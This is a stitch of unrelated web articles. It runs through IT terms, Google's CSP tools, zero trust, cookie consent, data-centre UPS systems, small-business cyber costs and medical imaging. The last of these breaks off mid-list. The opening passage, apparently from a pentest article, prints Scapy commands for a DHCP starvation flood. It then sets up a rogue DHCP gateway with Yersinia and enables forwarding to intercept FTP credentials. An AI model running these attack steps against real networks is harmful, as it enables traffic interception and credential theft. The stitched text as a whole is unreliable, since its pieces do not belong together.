>>> malicious_dhcp_discover /= IP(src="0.0.0.0", dst="255.255.255.255")
>>> malicious_dhcp_discover /= UDP(sport=68, dport=67)
>>> malicious_dhcp_discover /= BOOTP(op=1, chaddr=RandMAC())
>>> malicious_dhcp_discover /= DHCP(options=[('message-type', 'discover'), ('end')])
>>> sendp(malicious_dhcp_discover, iface="eth0", loop=1, verbose=1)
Success! The DHCP server has been disabled, and you can start creating its bogus counterpart.
After disabling the legitimate DHCP server, you can deploy a rogue DHCP server on your side and declare it the default gateway. When a DHCP server issues IP addresses to hosts on a network, it also transmits information about the IP address of the default gateway. Therefore, I configure my rogue DHCP server so that my IP address is specified as the default gateway. The client receives this address after sending a request to me; I become the default gateway on its side; and from now on, the client will send its packets to me.
I use Yersinia to deploy a rogue DHCP server.
Next, I use two commands to initiate an IP address update on the Windows 10 PC (in other words, I try to get an address from my rogue DHCP server):
C:\Windows\system32> ipconfig /release
C:\Windows\system32> ipconfig /renew
As you can see, the client received the IP address of the default gateway and information about it. Now I can try to intercept traffic since all the client’s traffic goes to me.
I switch the interface to the promiscuous mode and allow traffic forwarding on the interface:
c0ldheim@PWN:~$ sudo ifconfig eth0 promisc
c0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
As a result, I was able to intercept unencrypted FTP traffic with the following credentials: nightmare:
In this article, I have analyzed most of the attack scenarios targeting the data link layer of a computer network. Based on my personal pentesting experience, I can say that admins very often don’t pay due attention to L2 layer protocols and leave their default configurations intact. This, as you can see, can be exploited by an attacker.
Recently, L2 attacks have fallen out of fashion, and few people pay attention to them. Hopefully, this article will provide pentesters with new attack vectors and help network engineers raise the security of their networks.
Datafication: We know that data is increasing at an amazing rate. Datafication is the process through which businesses take information from people’s everyday lives and turn it into useful business data. The use of social media is a great example. It has become fairly common for businesses to use social media to determine personality characteristics of potential employees, replacing the personality tests that have been in use for many years; this approach has proven to be more accurate. The accumulation of this data is often best accomplished through the cloud.
Decentralized Cryptocurrency: No, it’s not something you would find in a cemetery. And, yes, cryptocurrency has developed something of an “underground” reputation (not entirely undeserved) as a form of payment used for nefarious purposes on the “dark web”. In actuality, cryptocurrencies are virtual currencies, meaning there are no physical representations, like bills or coins. Think of it like this: when you pay your credit card bill online, no one goes to a bank vault, takes a pile of dollar bills, and transfers it from your money shelf to the credit card company’s money shelf. It is all done electronically. If, however, you wanted to walk into your credit card company’s office and hand them a stack of bills, they would take it. Cryptocurrency is like this, except there is no hard-currency alternative. You do buy your cryptocurrency (e.g. Bitcoin) with real money electronically, but after that, all transactions take place only over the Internet.
Gamification: Every day, as more young people enter the workforce, a larger and larger percentage of the nation’s employed grew up with video gaming as a major source of entertainment. Many employers, especially those that tend to employ younger people, have discovered that setting goals based on gaming protocols, rather than standard targets, proves more effective. For example, every sale completed may result in the awarding of “experience points”, and upon receiving a certain number of points, the employee “levels up” (reaching the next plateau). When reaching a pre-set level, a cash or other prize is awarded. In other words, this is the “gamification” of goal setting.
Machine Learning: Machine learning is a function of AI, or Artificial Intelligence. What this means is that a computer gathers data from a variety of sources and then creates algorithms that use this data to develop reliable predictions. This can help a business learn more about existing and potential clients’ needs and, thereby, increase the likelihood of making the sale.
Microservices: Microservices come from a form of software architecture in which each piece of functionality is created as a separate program so as to be effectively independent of the other pieces. If a software customer needs a single piece of software functionality, they can purchase just that program and tie it together with similar standalone programs created by other software developers to end up with exactly the total functionality they need without having to have unique software written for them.
Open-Source: Open-source programs are those that are free and modifiable, and that can be used by anyone who wants to build an application around them. The use of open-source programs makes the development of custom programs for small businesses affordable.
We hope these posts on terminology have been helpful. If there are any other terms, or anything at all about IT solutions or IT support that you are curious about, please feel free to speak with one of our team members at 678.373.0716, or visit us at www.DynaSis.com.
Tech giant Google has issued tools to help web developers identify and mitigate cross-site scripting vulnerabilities, one of the most common forms of hacking attacks.
Servers that host websites, which run advertisements or any other imported content, must be able to accept HTML and other programming from outside sources. But that creates a way in which hackers can load malicious code into a website and attack anyone who even visits the site. Google recently found that 95 percent of one billion websites recently scanned by the company were vulnerable to XSS attacks, allowing hackers to load malicious code onto the computers of anyone who visited their page.
One such XSS attack is called a drive-by download. Because of the way browsers work — especially with the way autoplay video and audio content works — the unsuspecting visitor doesn’t even have to click on anything to become infected. Drive-by downloads enable watering-hole attacks, where hackers aiming at a highly secure enterprise will target an outside website that employees frequently visit.
For website developers, the answer to XSS is a content security policy, or CSP — essentially a set of instructions that tells the web server which programming inputs can be trusted.
But, wrote Google engineers in a blog post Monday launching the new tools, “In a recent Internet-wide study we analyzed over 1 billion domains and found that 95 percent of deployed CSP policies are ineffective as a protection against XSS” because they were poorly configured.
The tools — CSP Evaluator and CSP Mitigator — are designed to help website developers check that their CSP settings are correct. The engineers also suggest the use of the “nonce” — a one-time encryption code that validates an input from an outside source.
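A minimal sketch of the nonce approach in Python. The exact directives shown are illustrative, not a production policy; consult the CSP specification for real deployments:

```python
import secrets

def csp_header_with_nonce():
    # Generate a fresh, unguessable nonce per HTTP response. Only <script>
    # elements carrying nonce="..." with this exact value will execute.
    nonce = secrets.token_urlsafe(16)
    header = f"script-src 'nonce-{nonce}' 'strict-dynamic'; object-src 'none'"
    return nonce, header

nonce, header = csp_header_with_nonce()
print(f"'nonce-{nonce}'" in header)  # True: the policy whitelists this nonce
```

Because the nonce changes every response, an attacker injecting markup cannot predict the value needed to make their script run.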
Zero trust is a newer security model that assumes that all users and devices, whether inside or outside of an organization’s network, are untrusted and must be authenticated and authorized before they are granted access to resources. Zero trust aims to protect against cyber threats, such as data breaches and malware attacks, by eliminating the assumption that users and devices within an organization’s network are trustworthy.
One of the key principles of zero trust is the idea of “never trust, always verify.” This means that every request for access to a resource, whether it comes from a user within the organization or from an external device, must be verified before access is granted. This is in contrast to traditional security models, which often assume that users and devices within an organization’s network are trusted, and only external threats must be guarded against.
To implement a zero trust model, organizations typically use a variety of security controls, including multi-factor authentication, network segmentation, and application-level access controls. These controls are used to verify the identity of users and devices and ensure that they are authorized to access specific resources.
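A minimal, illustrative sketch of such a per-request check follows; the data structures stand in for real identity, device-posture, and policy services:

```python
# Zero trust in miniature: every request must pass identity, device,
# and least-privilege checks. Nothing is trusted by default.
def authorize(request, sessions, device_registry, acl):
    user = sessions.get(request["token"])            # verify identity
    if user is None:
        return False
    if request["device_id"] not in device_registry:  # verify device posture
        return False
    return request["resource"] in acl.get(user, ())  # authorization check

sessions = {"tok-123": "alice"}
devices = {"laptop-9"}
acl = {"alice": {"payroll-db"}}

print(authorize({"token": "tok-123", "device_id": "laptop-9",
                 "resource": "payroll-db"}, sessions, devices, acl))  # True
print(authorize({"token": "tok-123", "device_id": "byod-1",
                 "resource": "payroll-db"}, sessions, devices, acl))  # False
```

The point of the sketch is that the check runs on every request, even for users already “inside” the network.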
One of the key benefits of zero trust is that it helps to protect against insider threats, such as employees who may have malicious intentions or who may accidentally expose sensitive data. By requiring all users to be authenticated and authorized before they are granted access to resources, zero trust can prevent these types of threats from causing damage.
Another benefit of zero trust is that it can help organizations to comply with regulations and industry standards, such as the Payment Card Industry Data Security Standard (PCI DSS) and the Health Insurance Portability and Accountability Act (HIPAA). These regulations often require organizations to implement robust security measures to protect against data breaches and other cyber threats.
There are also some challenges associated with implementing a zero trust model. One of the main challenges is the complexity of the model, which requires organizations to implement and manage a variety of security controls and processes. This can be time-consuming and resource-intensive, and may require organizations to invest in additional security infrastructure and staff.
Another challenge is the potential impact on user experience. By requiring users to authenticate and authorize their access to resources, zero trust can add an extra layer of complexity to the process of accessing and using these resources. This may be particularly problematic for organizations that rely on many remote or mobile users, who may be less willing to tolerate the added security measures.
Despite these challenges, many organizations are adopting zero trust as a way to better protect against cyber threats. According to a survey by Forrester, 71% of organizations that have implemented zero trust reported a significant reduction in security incidents, while 79% reported an improvement in the overall security posture of their organization.
Overall, zero trust is a security model that is well-suited to the modern threat landscape, which is characterized by a proliferation of cyber threats and an increasing reliance on remote and mobile users. While implementing zero trust can be challenging, the benefits of increased security and compliance make it a worthwhile investment for many organizations.
Cookie consent opt-ins are a key aspect of today’s digital landscape, playing a vital role in user privacy and website compliance. Understanding their significance helps build trust and transparency with your audience.
A cookie consent opt-in means your website needs visitors' permission to place cookies on their browser. This informs users about data collection and requires explicit consent, ensuring compliance with privacy laws and protecting user data before tracking their online activity.
In other words, cookie consent opt-in forms are used to obtain consent from website visitors before enabling all cookies to act during a session. This is a necessary step that businesses must add to their websites under the General Data Protection Regulation (GDPR).
It upholds consumer’s rights to have control over the information that’s collected from them, limiting how businesses store, use, and sell their data. Through a cookie consent opt-in, consumers permit businesses to process their information through the use of website cookies, whether for functional analytics, marketing, or other related purposes.
To understand what cookie opt ins are, it's essential to first understand cookies themselves. Let's quickly cover the basics.
“Cookies” are small text files that websites place in the browser and read back to track user activity. They are basic components of web browsing; developers use them to improve the online experience. However, depending on how cookies behave, they can also pose a risk to user privacy.
There are three main kinds of cookies:
First-party cookies are created by and stored on the website or domain that a user is visiting. They are created to track user activity and preferences on a single website during a single session, optimizing the browsing experience. First-party cookies do not jump from one website or domain to another, and their work is done once the user terminates the session.
Second-party cookies aren’t technically a category of their own. These are just first-party cookies that are shared, exchanged, or sold between businesses under a data partnership or contract.
Third-party cookies are created and set by programs not owned or controlled by the website or domain that a user is visiting. They’re often used for advertising, marketing, and re-targeting, and they’re often placed on advertisements.
Third-party cookies track user activity from site to site over a long period. Third-party cookies are the kind that are often referenced in data privacy laws since these are the most invasive.
Now that you understand the basics, let's get back to cookie opt ins specifically.
Generally, cookies are harmless. A lot of them are used to optimize website functions, while others are used to personalize marketing efforts.
This is why data privacy laws implore businesses to obtain consent from users before employing cookies or to give consumers the option to opt out of the sale of any information collected from them through cookies.
Businesses, then, must comply with set regulations to avoid hefty fines and the loss of businesses in key markets like Europe and the United States.
To comply with the GDPR, businesses must obtain opt-in cookie consent from website visitors. To ensure this, it’s important to first block all cookies before getting consent by either turning off all cookies, hard-coding your website with cookie blocking scripts, or turning on cookie blocking plug-ins.
A compliant cookie consent notice also provides details about the types of active cookies and their purpose, any third parties that may employ cookies on the site, and how consumers can customize the cookies enabled during their session.
For businesses operating in the United States, or at least in the state of California, websites must instead provide opt-out options under the California Consumer Privacy Act (CCPA). This is similar to opt-in cookie consent in that the necessary information about cookies is provided to consumers, but the choice offered is whether or not a user consents to the sale of the personal information collected by cookies. Just in case you are asking yourself, “do I have to comply with CCPA?”, click on the link to find out.
Opting in to cookies allows for a personalized browsing experience with tailored content and ads, but it involves sharing more data. Opting out enhances privacy by limiting data collection but may result in less relevant content. Choose based on your privacy preferences and browsing needs.
Data privacy laws can be confusing. But the safest practice is to comply with all regulations, ensuring that consumer rights are upheld and prioritized at every step. For businesses complying with the GDPR, this starts with obtaining cookie opt-in consent from website visitors.
Meanwhile, for businesses under the CCPA, this begins with giving users the option to opt out of the sale of their information. Either way, what’s important is to give consumers the proper information about cookies and the avenue to control how their data is collected, used, and sold.
Contact Ketch’s team of privacy experts today to learn more about a consent management solution for your business.
Try out Ketch Free and start collecting consent in 5 minutes or less | <urn:uuid:613a1fcb-3a66-44fc-afd6-a8639c28aedc> | CC-MAIN-2024-38 | https://www.ketch.com/blog/posts/what-is-a-cookie-consent-opt-in | 2024-09-10T08:25:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00192.warc.gz | en | 0.944378 | 1,038 | 3.09375 | 3 |
Uninterruptible Power Supply (UPS) systems play a critical role in ensuring the uninterrupted operation of data centers. In the event of a power outage or other power-related issues, a UPS provides backup power to keep the data center running smoothly. In this article, we will explore the importance of UPS in data centers, different types of UPS systems, and factors to consider when choosing a UPS solution.
Related Link: Basic Tripping Settings for Circuit Breakers to Know
The Importance of UPS in Data Centers
Data centers house and operate mission-critical infrastructure, including servers, storage systems, networking equipment, and more. Any disruption in the power supply can have severe consequences, leading to data loss, system downtime, and financial losses. UPS systems act as a safeguard against these risks by providing uninterrupted power to the equipment during power outages, voltage fluctuations, or other power disturbances.
Preventing Data Loss: Data centers store vast amounts of valuable data, and sudden power interruptions can result in data corruption or loss. UPS systems give data center operators a critical window of time to gracefully shut down equipment and safely store data, mitigating the risk of data loss.
Minimizing Downtime: Downtime can have significant financial implications for businesses relying on data center services. UPS systems provide immediate backup power, allowing data center operators to continue operations seamlessly during power outages. This helps maintain productivity, customer satisfaction, and business continuity.
Protecting Equipment: Power disturbances such as surges, spikes, and voltage fluctuations can damage sensitive electronic equipment. UPS systems act as a line of defense, offering surge protection and voltage regulation to prevent equipment damage and premature failure.
Seeking guidance on integrating technology into your business? Let us provide you with the assistance you need. Contact us today!
Types of UPS Systems
There are several types of UPS systems available, each offering different levels of protection and functionality. Understanding the differences between these types can help data center operators choose the most suitable UPS solution for their specific needs.
- Standby UPS: Standby UPS systems are the most basic type and are commonly used for workstations or small-scale applications. They provide backup power by mechanically switching to battery power when a power failure occurs. Standby UPS systems are typically non-configurable and offer limited features.
- Line-interactive UPS: Line-interactive UPS systems offer more advanced features compared to standby UPS systems. They can handle not only power outages but also short-term under-voltages or over-voltages. Line-interactive UPS systems use an autotransformer to adjust the output voltage, providing smoother power delivery to connected equipment.
- Online Double-Conversion UPS: Online double-conversion UPS systems provide the highest level of power protection and are commonly used in data centers. These UPS systems continuously regenerate clean AC power through a continuous-duty inverter, seamlessly transitioning between the mains power and battery power. They offer superior protection against power fluctuations, ensuring that connected equipment receives conditioned and regulated power.
Choosing the Right UPS Solution
When selecting a UPS solution for a data center, several factors should be considered to ensure optimal performance and reliability.
- Capacity and Scalability: Assess the power requirements of the data center and choose a UPS system with sufficient capacity to support the load. Additionally, consider scalability options to accommodate future growth or increased power demands.
- Battery Life: The battery life of a UPS system is a critical factor to consider. Different UPS systems have varying battery life, and it is important to choose a system that aligns with the desired backup duration and operational needs. Valve-regulated lead-acid (VRLA) batteries, commonly used in UPS systems, typically have a lifespan of 3 to 5 years.
- Redundancy and Fault Tolerance: To ensure maximum uptime, consider UPS systems with built-in redundancy and fault tolerance features. Redundant UPS configurations, such as N+1 or 2N redundancy, allow for seamless power transfer in case of a UPS failure or maintenance. This ensures that critical equipment remains powered even during UPS maintenance or component failures.
- Efficiency and Energy Savings: UPS systems are not only responsible for providing backup power but also for ensuring efficient power delivery. Look for UPS systems with high-efficiency ratings, such as ENERGY STAR certified models, to minimize energy consumption and reduce operating costs.
- Monitoring and Management Capabilities: Advanced UPS systems offer monitoring and management features that provide real-time visibility into power usage, battery status, and system health. These features allow data center operators to proactively monitor UPS performance, identify potential issues, and take necessary actions to ensure continuous operation.
- Maintenance and Serviceability: Consider the ease of maintenance and serviceability when selecting a UPS system. Look for UPS models that provide easy access to components, hot-swappable batteries, and user-friendly interfaces for configuration and troubleshooting. This can significantly reduce downtime during maintenance or repair activities.
- Integration with Power Distribution Infrastructure: Ensure compatibility and seamless integration of the UPS system with existing power distribution infrastructure in the data center. Consider factors such as input/output voltage requirements, connectivity options, and compatibility with other power management systems.
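Several of the selection factors above, capacity, battery runtime, and redundancy, reduce to simple arithmetic. The following Python sketch uses purely illustrative figures (a 40 kW IT load, 0.9 power factor, 25% growth headroom, 50 kVA modules, a 9,600 Wh battery string); substitute your own measured values:

```python
import math

def required_ups_kva(load_watts, power_factor=0.9, headroom=0.25):
    """Minimum UPS rating in kVA: convert real power to apparent power,
    then add growth headroom."""
    return load_watts / power_factor * (1 + headroom) / 1000

def runtime_minutes(battery_wh, load_watts, inverter_efficiency=0.92):
    """Rough backup runtime: usable battery energy divided by load draw."""
    return battery_wh * inverter_efficiency / load_watts * 60

def modules_needed(load_kva, module_kva, redundancy="N+1"):
    """UPS module count for a load under a given redundancy scheme."""
    n = math.ceil(load_kva / module_kva)  # modules required to carry the load
    if redundancy == "N+1":
        return n + 1                      # one spare module
    if redundancy == "2N":
        return 2 * n                      # a fully duplicated system
    return n

load_w = 40_000  # illustrative 40 kW IT load
kva = required_ups_kva(load_w)
print(f"Required capacity: {kva:.1f} kVA")                    # 55.6 kVA
print(f"Runtime on battery: {runtime_minutes(9_600, load_w):.0f} min")
print(f"Modules at N+1: {modules_needed(kva, 50, 'N+1')}")    # 3
```

This is a first-pass sizing sketch only; vendors' sizing tools also account for battery aging, temperature derating, and inrush loads.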
Related Link: How to Calculate Data Center Cooling Needs
Battery Monitoring and Maintenance
Proper monitoring and maintenance of UPS batteries are crucial for ensuring their reliability and longevity. Regular battery inspections, testing, and preventive maintenance can help identify potential issues before they lead to unexpected failures. Monitoring the battery health, temperature, and voltage levels can provide valuable insights into their condition and allow data center operators to take proactive measures.
Battery replacement should be planned in accordance with manufacturer recommendations or based on battery performance indicators. Regularly scheduled battery replacements help prevent unexpected downtime and ensure that the UPS system can provide the intended backup power when needed.
Additionally, it is essential to establish proper battery storage conditions, including temperature and humidity control, to extend battery life. Implementing battery management software or systems can aid in monitoring battery health, predicting failures, and optimizing battery performance.
By paying close attention to battery monitoring and maintenance, data center operators can maximize the reliability of their UPS systems, minimize the risk of power interruptions, and effectively protect critical infrastructure, contributing to a robust and resilient data center environment.
Looking for new tech solutions? Contact us today!
The Crucial Role of UPS in Data Centers
Uninterruptible Power Supply (UPS) systems are essential for data centers to ensure uninterrupted power and protect critical infrastructure. They provide backup power during outages, prevent data loss, minimize downtime, and safeguard equipment against power disturbances. By understanding the different types of UPS systems and considering factors such as capacity, battery life, redundancy, efficiency, monitoring capabilities, and integration with power distribution infrastructure, data center operators can choose the right UPS solution that meets their specific needs.
Investing in a reliable UPS system is a crucial step toward securing uninterrupted power and maintaining the operational efficiency of data centers. As data centers continue to evolve and become more critical in the digital age, the importance of UPS systems in ensuring data integrity, system availability, and business continuity cannot be overstated. By prioritizing UPS solutions that align with their power requirements and operational goals, data center operators can enhance the reliability and resilience of their infrastructure, providing peace of mind and confidence in the face of power-related challenges.
Related Link: Why Hackers Love Smart Buildings [Security Update]
Last Updated on June 8, 2023 by Josh Mahan | <urn:uuid:3de2f885-bc4d-48fe-9f18-556072646e53> | CC-MAIN-2024-38 | https://cc-techgroup.com/data-center-ups/ | 2024-09-13T21:47:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00792.warc.gz | en | 0.925122 | 1,537 | 2.796875 | 3 |
Cyber attacks pose a significant threat to all businesses, with small businesses being especially vulnerable. A financially unprepared small firm can suffer significant losses in the event of an unforeseen cyberattack: harm to its reputation, pricing strategy, productivity, and staff morale, among other things. Understanding the potential severity of a cyber attack is crucial for entrepreneurs and small company owners to properly plan their operations. According to a report by the cyber security firm eSentire, the cost of cyber attacks is predicted to reach $10.5 trillion by 2025.
A study by IBM and the Ponemon Institute found that the average total cost of a data breach is $4.35 million, with critical infrastructure breaches averaging $4.82 million. This blog will discuss the hidden costs of being careless about security and how it can adversely affect finances.
Table of Content
- 1 Cost-benefit analysis for Cyber Security in Small Business
- 2 What happens when companies do not follow Cyber Security Guidelines?
- 3 How cyber attacks can be minimized?
- 4 Conclusion
Cost-benefit analysis for Cyber Security in Small Business
Small business owners worry about cybersecurity costs, but the benefits are greater. Cyber threats carry substantial risks, such as financial losses, harm to reputation, and legal liability. Prioritizing cybersecurity builds trust, prevents fines, and protects brand reputation. It also reduces the expensive downtime that cyberattacks inflict on business continuity.
Conducting comprehensive research to find an all-encompassing cyber security solution is essential. This approach allows small businesses to cut the costs of deploying multiple tools and to work within resource limitations. Adopting an all-in-one solution enables efficient allocation of the cyber security budget, providing a competitive edge in an increasingly digital landscape.
What happens when companies do not follow Cyber Security Guidelines?
If organizations do not follow cyber security guidelines, they risk financial losses, reputational damage, and operational disruption. Implementing robust measures is essential to protect against these risks and to ensure the overall health and success of the business.
Data breaches and Loss of Sensitive Information
Small companies often store sensitive customer data, including credit card records and personal identities. Without proper cyber security measures such as encryption, access controls, and regular VAPT (Vulnerability Assessment and Penetration Testing), this data may be accessed and stolen by cyber attackers.
For example, a small retail business may store customer payment information. If a cyber attacker breaches its systems through a vulnerability, they can steal that payment data and use it fraudulently.
Financial Loss to Organization
A data breach can result in large monetary losses: regulatory fines, the costs of investigating and settling the incident, compensation for affected parties, and legal fees. This can impose a sizeable financial burden on a small organization.
Damage to Organizational Reputation
A data breach or cyber-attack not only damages a business’s reputation but also raises doubts among customers about the organization’s data protection capabilities. The negative publicity and erosion of customer trust can have long-lasting repercussions, making it challenging to restore an organization’s image. For instance, when news of a breach spreads, customers lose confidence in the business’s ability to secure their information, which ultimately reduces customer loyalty and sales.
Cybersecurity laws like the General Data Protection Regulation (GDPR) and the Health Insurance Portability and Accountability Act (HIPAA) have strict fines and legal repercussions for violations.
How cyber attacks can be minimized?
A strong cybersecurity risk management strategy is essential to help your firm lower its exposure to cyber threats. To safeguard against threats like ransomware and business email compromise (BEC), corporate executives must constantly update, hone, and test their cybersecurity defenses. Here are best practices for minimizing cyber attacks:
Restricting and Managing Account Access
Starting the program with a zero-trust framework is advised, because account credentials are a prime target for threat actors. Under this strategy, account privileges are granted to users only when they actually need them. Have protocols in place for safely resetting credentials, or automate credential management using a privileged access management platform. Update your onboarding and offboarding processes as well to reflect a zero-trust philosophy.
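The just-in-time, default-deny grant idea above can be sketched in a few lines of Python. This is an illustrative toy (user names and privilege labels are invented), not a production access-control system:

```python
import time

# Just-in-time privilege grants: access is time-boxed and default-deny.
grants = {}  # (user, privilege) -> expiry timestamp

def grant(user, privilege, minutes):
    """Record a temporary grant that expires automatically."""
    grants[(user, privilege)] = time.time() + minutes * 60

def is_allowed(user, privilege):
    """Zero trust: deny unless an unexpired grant exists."""
    expiry = grants.get((user, privilege))
    return expiry is not None and time.time() < expiry

grant("alice", "db-admin", minutes=30)
print(is_allowed("alice", "db-admin"))  # True while the grant is live
print(is_allowed("bob", "db-admin"))    # False: no grant, so denied
```

Real privileged access management platforms add approval workflows, audit logging, and credential rotation on top of this core expiry check.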
Implement signed software execution policies
An operating system should be configured to utilize secure boot, a function that ensures devices exclusively initiate using verified and secure software. This necessitates the enforcement of policies for executing signed software, device drivers, and system firmware. Allowing the execution of unsigned software could provide cyber attackers with a potential entry point.
Software Updates and Upgrades
Install software updates promptly, and automate them for enhanced security. Cyber attackers move quickly to exploit known vulnerabilities once a patch is released.
Book a Free Consultation with our Cyber Security Experts
Ignoring cybersecurity can result in notable financial and reputational harm, particularly for small businesses. Considering the enduring advantages, small businesses should prioritize cybersecurity despite the initial expense. By reducing downtime caused by cyber incidents, this strategy promotes trust, compliance, and business continuity.
Adopting comprehensive cybersecurity solutions optimizes resource management and offers a competitive advantage. Kratikal, an auditor certified by CERT-In, specializes in delivering Vulnerability Assessment and Penetration Testing (VAPT) and compliance services. Leveraging these services effectively can bolster your company’s cybersecurity defenses, as Kratikal's experts identify and mitigate vulnerabilities. Overall, proactive cybersecurity measures are vital for mitigating cyber threats and protecting business operations and reputation.
Ever since Wilhelm Conrad Röntgen discovered the X-rays in 1895, medical imaging has played an increasingly important role in clinical diagnostics helping clinicians screen, diagnose and monitor various health conditions. Beginning from a humble X-ray system, which still holds a significant position in medical imaging, the industry has seen the launch of Computed Tomography (CT), Mammography, Ultrasound, Magnetic Resonance Imaging (MRI), Positron Emission Tomography (PET), Bone Mineral Densitometry (BMD) and various other diagnostic modalities that have revolutionized the diagnostic and treatment protocols in the clinical world. Invasive exploratory surgeries which were considered standard a couple of decades ago, have been largely replaced with diagnostic imaging which are non-invasive and provide the physicians and surgeons with anatomical and functional details up to cellular and molecular levels. Imaging not only occupies an important role in screening and diagnostics but also forms the basis for interventional radiology, radiotherapy and image guidance procedures.
CT and X-ray continue to be the diagnostic modalities of choice for a large number of illnesses. Cathlabs and surgical c-arms have cemented their place in the OR and hybrid suites and look indomitable by any other technology in the near future. Non-ionizing technologies such as MRI and ultrasonography have carved out a superior position for themselves in certain applications. Most of these techniques have been around for at least a few decades and can be labelled as “mature” technologies. Despite the enormous progress made by the imaging industry in the recent past, several challenges have been restricting the utilization of these technologies to their maximum potential. The harmful effects of ionizing radiation are a key barrier to large-scale utilization of X-ray based technologies. MRI, CT, and PET are expensive tests and as such not suitable for mass screening. The entire healthcare business is moving toward point-of-care testing, and the imaging industry ranks low on portability and miniaturization parameters. Interestingly, there are several technologies in various stages of development which could potentially improve the efficiency, minimize the harmful effects, or challenge the gold standard imaging modalities by virtue of being safe, affordable, convenient, and suitable for mass screening.
In this article, we will briefly explore the promising technologies across different platforms impacting the imaging industry and dwell on the benefits for the clinicians and patients.
1) Innovation in existing imaging technologies
a) Phase Contrast Imaging (PCI)
b) Magnetoencephalogram-Magnetic Resonace Imaging (MEG-MRI)
c) Magnetic Resonance – Positron Emission Tomography (MR-PET)
d) Magneto Acoustic Tomography
a) Liquid Biopsy
3) Bioelectric signals
a) Electroretinogram (ERG) and Visually Evoked Potential (VEP)
4) Optical Technologies
a) Optical coherence tomography (OCT)
b) Capsule endoscopy/ Camera pills
5) Radiowave Imaging
a) Microwave Imaging
1. Innovation in existing imaging technologies
1.1. Phase Contrast Imaging (PCI)
Current x-ray modality is based on the principle of attenuation in varying grades by different tissues in the region of interest being imaged. The generation of contrast is solely dependent on the absorption of x-rays. Phase contrast imaging (PCI) is a new x-ray technology which leverages the diffraction property of tissues to introduce phase shift of the x-ray waveforms passing through it. This allows for a larger spectrum of contrast in x-ray imaging. Soft tissues with differing diffraction properties will be seen with different contrasts, thus increasing the utility of x-rays in non-bone imaging. PCI will utilize very low doses of X-ray than conventional x-ray and increase the spatial resolution as well. Visualization of different contrasts of soft tissue with lower radiation promises a wider spectrum of diagnostic and interventional applications for x-ray and CT. The challenges are that the research studies are all based on giant synchrotron sources of x-ray. Key milestone in realizing this technology would be perfecting the x-ray source from a normal focus or microfocus x-ray tube and an equivalent innovation in the detector sensors to capture the phase change contrasts. With the promise of lower X-ray dose and a broad contrast scale, PCI has enormous potential to disrupt conventional x-ray (diagnostic and interventional), mammography and CT imaging markets.
1.2. MEG-MRI
This hybrid technology combines magnetoencephalography (MEG) and ultra-low-field MRI techniques. The advantage of this combination is that the ultra-low-field MRI uses the superconducting quantum interference device (SQUID) sensors available in MEG, instead of RF coils, for detection. MEG technology detects the ultra-low magnetic fields generated by electrical activity in the neurons of the brain. Various institutions are exploring the possibility of using this technology for neuroimaging. Achieving MR signal detection with SQUID devices rather than RF coils will be a key milestone in the development of this imaging technology, which could then challenge standalone MRI and CT as the current standards for neuroimaging.
1.3. MR – PET
Early PET-MRI imaging was done serially, with the two scanners placed in adjacent rooms and the patient shuttled quickly between them. With this method, motion-induced artefacts were a major concern in the image output. A truly integrated PET-MRI with a single gantry was introduced by Siemens, and this system can exploit the advantages of both PET and MRI in the following disease areas:
- Neuro Imaging – Alzheimer's Amyloid Imaging
- Cardiac Imaging for assessing the morphology and function of cardiac wall, pericardium, valves, coronary arteries, ischaemia, infarction, wall thickness, wall motion, and so on
- Cancer Imaging – Head & Neck cancer, Breast cancer, Gastrointestinal tumors, Lung cancer, Gynecological cancer, Soft tissue and bone tumors
- Musculoskeletal imaging – joints, ligaments, tendon, osteomyelitis evaluation, and so on
- Inflammatory disorders
- Paediatric imaging in view of the lower radiation dose as compared to PET-CT
What is holding back wider adoption of MR-PET is the lack of a clear definition of the clinical indications in which PET-MRI should be used. Usage has been mostly research based and only minimally clinical. While the indications are being defined, regulatory and reimbursement issues are expected to be ironed out soon. This hybrid technology has the potential to become the gold standard for oncology imaging and neuro-imaging in the future, challenging standalone PET, CT, and MRI modalities.
1.4. Magneto Acoustic Tomography
It has been observed that the electrical properties of normal cells and cancerous cells are different. This is expected as a result of the differing water content, membrane permeability, extracellular fluid, and orientation characteristics of tumour cells. There are also notable electrical differences between ischaemic cells and normal cells. The differing electrical properties between normal and cancerous/ischaemic cells are exploited by this non-invasive technology. Of the different methods to measure the electrical activity, coupling electromagnetic induction with ultrasonic detection seems to be the most practical and lowest in cost. Magnetoacoustic tomography with magnetic induction (MAT-MI) induces an eddy current in the conductive sample and generates acoustic vibrations through the Lorentz force coupling mechanism. Ultrasound waves are then sensed to reconstruct an image based on electrical conductivity. This technology has enormous applications in cancer screening, diagnosis, and treatment monitoring, and the potential to challenge PET, CT, MRI, SPECT, and mammography. The challenges lie in improving sensitivity, instrumentation, and reconstruction algorithms, which have yet to reach levels acceptable for clinical use.
2.1. Liquid Biopsy
Liquid biopsies are based on measuring the circulating tumor cells (CTCs) and circulating tumor DNA (ctDNA) in the body fluids of affected patients. These cells are released into the blood and other liquid tissues from the tumor. The CTCs are enriched using specialized instruments and then enumerated to diagnose cancer or to monitor treatment. The USFDA approved the first liquid biopsy test in June 2016 for the treatment planning of non-small cell lung carcinoma (NSCLC). Subsequently, various products have been launched for the diagnosis and treatment monitoring of lung, breast, prostate, and colorectal tumours. Liquid biopsy is increasingly being looked upon as a replacement for surgical biopsies, since it has inherent advantages over tissue sampling. Liquid biopsies are also increasingly demonstrating results that match gold standard imaging modalities such as PET, CT, MRI, SPECT, and mammography in cancer diagnosis and in assessing treatment response. Continuing research will further promote liquid biopsy either as an adjunct to the other imaging modalities or as a standalone tool for cancer screening, diagnosis, and treatment monitoring.
3. Bioelectric signals
3.1. Electroretinogram (ERG) and Visually Evoked Potentials (VEP)
